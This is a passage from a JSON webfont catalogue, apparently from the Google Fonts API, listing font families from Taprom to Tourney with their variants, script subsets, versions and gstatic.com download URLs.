\"http://fonts.gstatic.com/s/taprom/v27/UcCn3F82JHycULbFQyk3-0kvHg.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Tauri\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v16\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/tauri/v16/TwMA-IISS0AM3IpVWHU_TBqO.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Taviraj\",\n      \"variants\": [\n        \"100\",\n        \"100italic\",\n        \"200\",\n        \"200italic\",\n        \"300\",\n        \"300italic\",\n        \"regular\",\n        \"italic\",\n        \"500\",\n        \"500italic\",\n        \"600\",\n        \"600italic\",\n        \"700\",\n        \"700italic\",\n        \"800\",\n        \"800italic\",\n        \"900\",\n        \"900italic\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"thai\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v11\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"100\": \"http://fonts.gstatic.com/s/taviraj/v11/ahcbv8Cj3ylylTXzRIorV8N1jU2gog.ttf\",\n        \"100italic\": \"http://fonts.gstatic.com/s/taviraj/v11/ahcdv8Cj3ylylTXzTOwTM8lxr0iwolLl.ttf\",\n        \"200\": \"http://fonts.gstatic.com/s/taviraj/v11/ahccv8Cj3ylylTXzRCYKd-lbgUS5u0s.ttf\",\n        \"200italic\": \"http://fonts.gstatic.com/s/taviraj/v11/ahcev8Cj3ylylTXzTOwTn-hRhWa8q0v8ag.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/taviraj/v11/ahccv8Cj3ylylTXzREIJd-lbgUS5u0s.ttf\",\n        \"300italic\": \"http://fonts.gstatic.com/s/taviraj/v11/ahcev8Cj3ylylTXzTOwT--tRhWa8q0v8ag.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/taviraj/v11/ahcZv8Cj3ylylTXzfO4hU-FwnU0.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/taviraj/v11/ahcbv8Cj3ylylTXzTOwrV8N1jU2gog.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/taviraj/v11/ahccv8Cj3ylylTXzRBoId-lbgUS5u0s.ttf\",\n        \"500italic\": \"http://fonts.gstatic.com/s/taviraj/v11/ahcev8Cj3ylylTXzTOwTo-pRhWa8q0v8ag.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/taviraj/v11/ahccv8Cj3ylylTXzRDYPd-lbgUS5u0s.ttf\",\n        \"600italic\": \"http://fonts.gstatic.com/s/taviraj/v11/ahcev8Cj3ylylTXzTOwTj-1RhWa8q0v8ag.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/taviraj/v11/ahccv8Cj3ylylTXzRFIOd-lbgUS5u0s.ttf\",\n        \"700italic\": \"http://fonts.gstatic.com/s/taviraj/v11/ahcev8Cj3ylylTXzTOwT6-xRhWa8q0v8ag.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/taviraj/v11/ahccv8Cj3ylylTXzRE4Nd-lbgUS5u0s.ttf\",\n        \"800italic\": \"http://fonts.gstatic.com/s/taviraj/v11/ahcev8Cj3ylylTXzTOwT9-9RhWa8q0v8ag.ttf\",\n        \"900\": \"http://fonts.gstatic.com/s/taviraj/v11/ahccv8Cj3ylylTXzRGoMd-lbgUS5u0s.ttf\",\n        \"900italic\": \"http://fonts.gstatic.com/s/taviraj/v11/ahcev8Cj3ylylTXzTOwT0-5RhWa8q0v8ag.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Teko\",\n      \"variants\": [\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\"\n      ],\n      \"subsets\": [\n        \"devanagari\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v15\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"300\": \"http://fonts.gstatic.com/s/teko/v15/LYjCdG7kmE0gdQhfgCNqqVIuTN4.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/teko/v15/LYjNdG7kmE0gTaR3pCtBtVs.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/teko/v15/LYjCdG7kmE0gdVBegCNqqVIuTN4.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/teko/v15/LYjCdG7kmE0gdXxZgCNqqVIuTN4.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/teko/v15/LYjCdG7kmE0gdRhYgCNqqVIuTN4.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Telex\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v17\",\n      \"lastModified\": \"2022-12-08\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/telex/v17/ieVw2Y1fKWmIO9fTB1piKFIf.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Tenali Ramakrishna\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"telugu\"\n      ],\n      \"version\": \"v12\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/tenaliramakrishna/v12/raxgHj6Yt9gAN3LLKs0BZVMo8jmwn1-8KJXqUFFvtA.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Tenor Sans\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"cyrillic\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v17\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/tenorsans/v17/bx6ANxqUneKx06UkIXISr3JyC22IyqI.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Text Me One\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v20\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/textmeone/v20/i7dOIFdlayuLUvgoFvHQFWZcalayGhyV.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Texturina\",\n      \"variants\": [\n        \"100\",\n        \"200\",\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"800\",\n        \"900\",\n        \"100italic\",\n        \"200italic\",\n        \"300italic\",\n        \"italic\",\n        \"500italic\",\n        \"600italic\",\n        \"700italic\",\n        \"800italic\",\n        \"900italic\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v21\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"100\": \"http://fonts.gstatic.com/s/texturina/v21/c4mM1nxpEtL3pXiAulRTkY-HGmNEX1b9NspjMwhAgliHhVrXy2eYG_Ug25riW1OD.ttf\",\n        \"200\": \"http://fonts.gstatic.com/s/texturina/v21/c4mM1nxpEtL3pXiAulRTkY-HGmNEX1b9NspjMwhAgliHhVrXy2cYGvUg25riW1OD.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/texturina/v21/c4mM1nxpEtL3pXiAulRTkY-HGmNEX1b9NspjMwhAgliHhVrXy2fGGvUg25riW1OD.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/texturina/v21/c4mM1nxpEtL3pXiAulRTkY-HGmNEX1b9NspjMwhAgliHhVrXy2eYGvUg25riW1OD.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/texturina/v21/c4mM1nxpEtL3pXiAulRTkY-HGmNEX1b9NspjMwhAgliHhVrXy2eqGvUg25riW1OD.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/texturina/v21/c4mM1nxpEtL3pXiAulRTkY-HGmNEX1b9NspjMwhAgliHhVrXy2dGHfUg25riW1OD.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/texturina/v21/c4mM1nxpEtL3pXiAulRTkY-HGmNEX1b9NspjMwhAgliHhVrXy2d_HfUg25riW1OD.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/texturina/v21/c4mM1nxpEtL3pXiAulRTkY-HGmNEX1b9NspjMwhAgliHhVrXy2cYHfUg25riW1OD.ttf\",\n        \"900\": \"http://fonts.gstatic.com/s/texturina/v21/c4mM1nxpEtL3pXiAulRTkY-HGmNEX1b9NspjMwhAgliHhVrXy2cxHfUg25riW1OD.ttf\",\n        \"100italic\": \"http://fonts.gstatic.com/s/texturina/v21/c4mO1nxpEtL3pXiAulR5mL129FhZmLj7I4oiSUJyfYDu7sB5zHJQWR1i0Z7AXkODN94.ttf\",\n        \"200italic\": \"http://fonts.gstatic.com/s/texturina/v21/c4mO1nxpEtL3pXiAulR5mL129FhZmLj7I4oiSUJyfYDu7sB5zHJQWZ1j0Z7AXkODN94.ttf\",\n        \"300italic\": \"http://fonts.gstatic.com/s/texturina/v21/c4mO1nxpEtL3pXiAulR5mL129FhZmLj7I4oiSUJyfYDu7sB5zHJQWUNj0Z7AXkODN94.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/texturina/v21/c4mO1nxpEtL3pXiAulR5mL129FhZmLj7I4oiSUJyfYDu7sB5zHJQWR1j0Z7AXkODN94.ttf\",\n        \"500italic\": \"http://fonts.gstatic.com/s/texturina/v21/c4mO1nxpEtL3pXiAulR5mL129FhZmLj7I4oiSUJyfYDu7sB5zHJQWS9j0Z7AXkODN94.ttf\",\n        \"600italic\": \"http://fonts.gstatic.com/s/texturina/v21/c4mO1nxpEtL3pXiAulR5mL129FhZmLj7I4oiSUJyfYDu7sB5zHJQWcNk0Z7AXkODN94.ttf\",\n        \"700italic\": \"http://fonts.gstatic.com/s/texturina/v21/c4mO1nxpEtL3pXiAulR5mL129FhZmLj7I4oiSUJyfYDu7sB5zHJQWfpk0Z7AXkODN94.ttf\",\n        \"800italic\": \"http://fonts.gstatic.com/s/texturina/v21/c4mO1nxpEtL3pXiAulR5mL129FhZmLj7I4oiSUJyfYDu7sB5zHJQWZ1k0Z7AXkODN94.ttf\",\n        \"900italic\": \"http://fonts.gstatic.com/s/texturina/v21/c4mO1nxpEtL3pXiAulR5mL129FhZmLj7I4oiSUJyfYDu7sB5zHJQWbRk0Z7AXkODN94.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Thasadith\",\n      \"variants\": [\n        \"regular\",\n        \"italic\",\n        \"700\",\n        \"700italic\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"thai\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v9\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/thasadith/v9/mtG44_1TIqPYrd_f5R1YsEkU0CWuFw.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/thasadith/v9/mtG-4_1TIqPYrd_f5R1oskMQ8iC-F1ZE.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/thasadith/v9/mtG94_1TIqPYrd_f5R1gDGYw2A6yHk9d8w.ttf\",\n        \"700italic\": \"http://fonts.gstatic.com/s/thasadith/v9/mtGj4_1TIqPYrd_f5R1osnus3QS2PEpN8zxA.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"The Girl Next Door\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v18\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/thegirlnextdoor/v18/pe0zMJCIMIsBjFxqYBIcZ6_OI5oFHCYIV7t7w6bE2A.ttf\"\n      },\n      \"category\": \"handwriting\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"The Nautigal\",\n      \"variants\": [\n        \"regular\",\n        \"700\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v3\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/thenautigal/v3/VdGZAZ8ZH51Lvng9fQV2bfKr5wVk09Se5Q.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/thenautigal/v3/VdGGAZ8ZH51Lvng9fQV2bfKTWypA2_-C7LoS7g.ttf\"\n      },\n      \"category\": \"handwriting\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Tienne\",\n      \"variants\": [\n        \"regular\",\n        \"700\",\n        \"900\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v20\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/tienne/v20/AYCKpX7pe9YCRP0LkEPHSFNyxw.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/tienne/v20/AYCJpX7pe9YCRP0zLGzjQHhuzvef5Q.ttf\",\n        \"900\": \"http://fonts.gstatic.com/s/tienne/v20/AYCJpX7pe9YCRP0zFG7jQHhuzvef5Q.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Tillana\",\n      \"variants\": [\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"800\"\n      ],\n      \"subsets\": [\n        \"devanagari\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v11\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/tillana/v11/VuJxdNvf35P4qJ1OeKbXOIFneRo.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/tillana/v11/VuJ0dNvf35P4qJ1OQFL-HIlMZRNcp0o.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/tillana/v11/VuJ0dNvf35P4qJ1OQH75HIlMZRNcp0o.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/tillana/v11/VuJ0dNvf35P4qJ1OQBr4HIlMZRNcp0o.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/tillana/v11/VuJ0dNvf35P4qJ1OQAb7HIlMZRNcp0o.ttf\"\n      },\n      \"category\": \"handwriting\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Timmana\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"telugu\"\n      ],\n      \"version\": \"v12\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/timmana/v12/6xKvdShfL9yK-rvpCmvbKHwJUOM.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Tinos\",\n      \"variants\": [\n        \"regular\",\n        \"italic\",\n        \"700\",\n        \"700italic\"\n      ],\n      \"subsets\": [\n        \"cyrillic\",\n        \"cyrillic-ext\",\n        \"greek\",\n        \"greek-ext\",\n        \"hebrew\",\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v24\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/tinos/v24/buE4poGnedXvwgX8dGVh8TI-.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/tinos/v24/buE2poGnedXvwjX-fmFD9CI-4NU.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/tinos/v24/buE1poGnedXvwj1AW0Fp2i43-cxL.ttf\",\n        \"700italic\": \"http://fonts.gstatic.com/s/tinos/v24/buEzpoGnedXvwjX-Rt1s0CoV_NxLeiw.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Tiro Bangla\",\n      \"variants\": [\n        \"regular\",\n        \"italic\"\n      ],\n      \"subsets\": [\n        \"bengali\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v6\",\n      \"lastModified\": \"2023-01-06\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/tirobangla/v6/IFSgHe1Tm95E3O8b5i2V8MG9-UPeuz4i.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/tirobangla/v6/IFSiHe1Tm95E3O8b5i2V8PG_80f8vi4imBM.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Tiro Devanagari Hindi\",\n      \"variants\": [\n        \"regular\",\n        \"italic\"\n      ],\n      \"subsets\": [\n        \"devanagari\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v5\",\n      \"lastModified\": \"2023-01-06\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/tirodevanagarihindi/v5/55xyezN7P8T4e0_CfIJrwdodg9HoYw0i-M9fSOkOfG0Y3A.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/tirodevanagarihindi/v5/55x8ezN7P8T4e0_CfIJrwdodg9HoYw0i-M9vSuMKXmgI3F_o.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Tiro Devanagari Marathi\",\n      \"variants\": [\n        \"regular\",\n        \"italic\"\n      ],\n      \"subsets\": [\n        \"devanagari\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v5\",\n      \"lastModified\": \"2023-01-06\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/tirodevanagarimarathi/v5/fC1xPZBSZHrRhS3rd4M0MAPNJUHl4znXCxAkotDrDJYM2lAZ.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/tirodevanagarimarathi/v5/fC1zPZBSZHrRhS3rd4M0MAPNJUHl4znXCxAkouDpBpIu30AZbUY.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Tiro Devanagari Sanskrit\",\n      \"variants\": [\n        \"regular\",\n        \"italic\"\n      ],\n      \"subsets\": [\n        \"devanagari\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v5\",\n      \"lastModified\": \"2023-01-06\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/tirodevanagarisanskrit/v5/MCoAzBbr09vVUgVBM8FWu_yZdZkhkg-I0nUlb59pEoEqgtOh0w.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/tirodevanagarisanskrit/v5/MCoGzBbr09vVUgVBM8FWu_yZdZkhkg-I0nUlb59ZEIsuoNax06MM.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Tiro Gurmukhi\",\n      \"variants\": [\n        \"regular\",\n        \"italic\"\n      ],\n      \"subsets\": [\n        \"gurmukhi\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v6\",\n      \"lastModified\": \"2023-01-06\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/tirogurmukhi/v6/x3dmckXSYq-Uqjc048JUF7Jvly7HAQsyA2Y.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/tirogurmukhi/v6/x3d4ckXSYq-Uqjc048JUF7JvpyzNBSk3E2YljQ.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Tiro Kannada\",\n      \"variants\": [\n        \"regular\",\n        \"italic\"\n      ],\n      \"subsets\": [\n        \"kannada\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v6\",\n      \"lastModified\": \"2023-01-06\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/tirokannada/v6/CSR44ztKmvqaDxEDJFY7CIYKSPl6tOU9Eg.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/tirokannada/v6/CSRm4ztKmvqaDxEDJFY7CIY6SvN-luAtEnKp.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Tiro Tamil\",\n      \"variants\": [\n        \"regular\",\n        \"italic\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"tamil\"\n      ],\n      \"version\": \"v6\",\n      \"lastModified\": \"2023-01-06\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/tirotamil/v6/m8JXjfVIf7OT22n3M-S_ULRvamODxdI.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/tirotamil/v6/m8JVjfVIf7OT22n3M-S_YLZlbkGG1dKEDw.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Tiro Telugu\",\n      \"variants\": [\n        \"regular\",\n        \"italic\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"telugu\"\n      ],\n      \"version\": \"v7\",\n      \"lastModified\": \"2023-02-02\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/tirotelugu/v7/aFTQ7PxlZWk2EPiSymjXdKSNQqn0X0BO.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/tirotelugu/v7/aFTS7PxlZWk2EPiSymjXdJSPSK3WWlBOoas.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Titan One\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v13\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/titanone/v13/mFTzWbsGxbbS_J5cQcjykzIn2Etikg.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Titillium Web\",\n      \"variants\": [\n        \"200\",\n        \"200italic\",\n        \"300\",\n        \"300italic\",\n        \"regular\",\n        \"italic\",\n        \"600\",\n        \"600italic\",\n        \"700\",\n        \"700italic\",\n        \"900\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v15\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"200\": \"http://fonts.gstatic.com/s/titilliumweb/v15/NaPDcZTIAOhVxoMyOr9n_E7ffAzHKIx5YrSYqWM.ttf\",\n        \"200italic\": \"http://fonts.gstatic.com/s/titilliumweb/v15/NaPFcZTIAOhVxoMyOr9n_E7fdMbewI1zZpaduWMmxA.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/titilliumweb/v15/NaPDcZTIAOhVxoMyOr9n_E7ffGjEKIx5YrSYqWM.ttf\",\n        \"300italic\": \"http://fonts.gstatic.com/s/titilliumweb/v15/NaPFcZTIAOhVxoMyOr9n_E7fdMbepI5zZpaduWMmxA.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/titilliumweb/v15/NaPecZTIAOhVxoMyOr9n_E7fRMTsDIRSfr0.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/titilliumweb/v15/NaPAcZTIAOhVxoMyOr9n_E7fdMbmCKZXbr2BsA.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/titilliumweb/v15/NaPDcZTIAOhVxoMyOr9n_E7ffBzCKIx5YrSYqWM.ttf\",\n        \"600italic\": \"http://fonts.gstatic.com/s/titilliumweb/v15/NaPFcZTIAOhVxoMyOr9n_E7fdMbe0IhzZpaduWMmxA.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/titilliumweb/v15/NaPDcZTIAOhVxoMyOr9n_E7ffHjDKIx5YrSYqWM.ttf\",\n        \"700italic\": \"http://fonts.gstatic.com/s/titilliumweb/v15/NaPFcZTIAOhVxoMyOr9n_E7fdMbetIlzZpaduWMmxA.ttf\",\n        \"900\": \"http://fonts.gstatic.com/s/titilliumweb/v15/NaPDcZTIAOhVxoMyOr9n_E7ffEDBKIx5YrSYqWM.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Tomorrow\",\n      \"variants\": [\n        \"100\",\n        \"100italic\",\n        \"200\",\n        \"200italic\",\n        \"300\",\n        \"300italic\",\n        \"regular\",\n        \"italic\",\n        \"500\",\n        \"500italic\",\n        \"600\",\n        \"600italic\",\n        \"700\",\n        \"700italic\",\n        \"800\",\n        \"800italic\",\n        \"900\",\n        \"900italic\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v15\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"100\": \"http://fonts.gstatic.com/s/tomorrow/v15/WBLgrETNbFtZCeGqgR2xe2XiKMiokE4.ttf\",\n        \"100italic\": \"http://fonts.gstatic.com/s/tomorrow/v15/WBLirETNbFtZCeGqgRXXQwHoLOqtgE5h0A.ttf\",\n        \"200\": \"http://fonts.gstatic.com/s/tomorrow/v15/WBLhrETNbFtZCeGqgR0dWkXIBsShiVd4.ttf\",\n        \"200italic\": \"http://fonts.gstatic.com/s/tomorrow/v15/WBLjrETNbFtZCeGqgRXXQ63JDMCDjEd4yVY.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/tomorrow/v15/WBLhrETNbFtZCeGqgR15WUXIBsShiVd4.ttf\",\n        \"300italic\": \"http://fonts.gstatic.com/s/tomorrow/v15/WBLjrETNbFtZCeGqgRXXQ8nKDMCDjEd4yVY.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/tomorrow/v15/WBLmrETNbFtZCeGqgSXVcWHALdio.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/tomorrow/v15/WBLgrETNbFtZCeGqgRXXe2XiKMiokE4.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/tomorrow/v15/WBLhrETNbFtZCeGqgR0hWEXIBsShiVd4.ttf\",\n        \"500italic\": \"http://fonts.gstatic.com/s/tomorrow/v15/WBLjrETNbFtZCeGqgRXXQ5HLDMCDjEd4yVY.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/tomorrow/v15/WBLhrETNbFtZCeGqgR0NX0XIBsShiVd4.ttf\",\n        \"600italic\": \"http://fonts.gstatic.com/s/tomorrow/v15/WBLjrETNbFtZCeGqgRXXQ73MDMCDjEd4yVY.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/tomorrow/v15/WBLhrETNbFtZCeGqgR1pXkXIBsShiVd4.ttf\",\n        \"700italic\": \"http://fonts.gstatic.com/s/tomorrow/v15/WBLjrETNbFtZCeGqgRXXQ9nNDMCDjEd4yVY.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/tomorrow/v15/WBLhrETNbFtZCeGqgR11XUXIBsShiVd4.ttf\",\n        \"800italic\": \"http://fonts.gstatic.com/s/tomorrow/v15/WBLjrETNbFtZCeGqgRXXQ8XODMCDjEd4yVY.ttf\",\n        \"900\": \"http://fonts.gstatic.com/s/tomorrow/v15/WBLhrETNbFtZCeGqgR1RXEXIBsShiVd4.ttf\",\n        \"900italic\": \"http://fonts.gstatic.com/s/tomorrow/v15/WBLjrETNbFtZCeGqgRXXQ-HPDMCDjEd4yVY.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Tourney\",\n      \"variants\": [\n        \"100\",\n        \"200\",\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"800\",\n        \"900\",\n        \"100italic\",\n        \"200italic\",\n        \"300italic\",\n        \"italic\",\n        \"500italic\",\n        \"600italic\",\n        \"700italic\",\n        \"800italic\",\n        \"900italic\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v8\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"100\": \"http://fonts.gstatic.com/s/tourney/v8/AlZa_ztDtYzv1tzq1wcJnbVt7xseomk-tNs7qrzTWbyt8n7GOQByZTp1I1LcGA.ttf\",\n        \"200\": \"http://fonts.gstatic.com/s/tourney/v8/AlZa_ztDtYzv1tzq1wcJnbVt7xseomk-tNs7qrzTWbyt8n7GuQFyZTp1I1LcGA.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/tourney/v8/AlZa_ztDtYzv1tzq1wcJnbVt7xseomk-tNs7qrzTWbyt8n7GZwFyZTp1I1LcGA.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/tourney/v8/AlZa_ztDtYzv1tzq1wcJnbVt7xseomk-tNs7qrzTWbyt8n7GOQFyZTp1I1LcGA.ttf\",\n        \"500\": 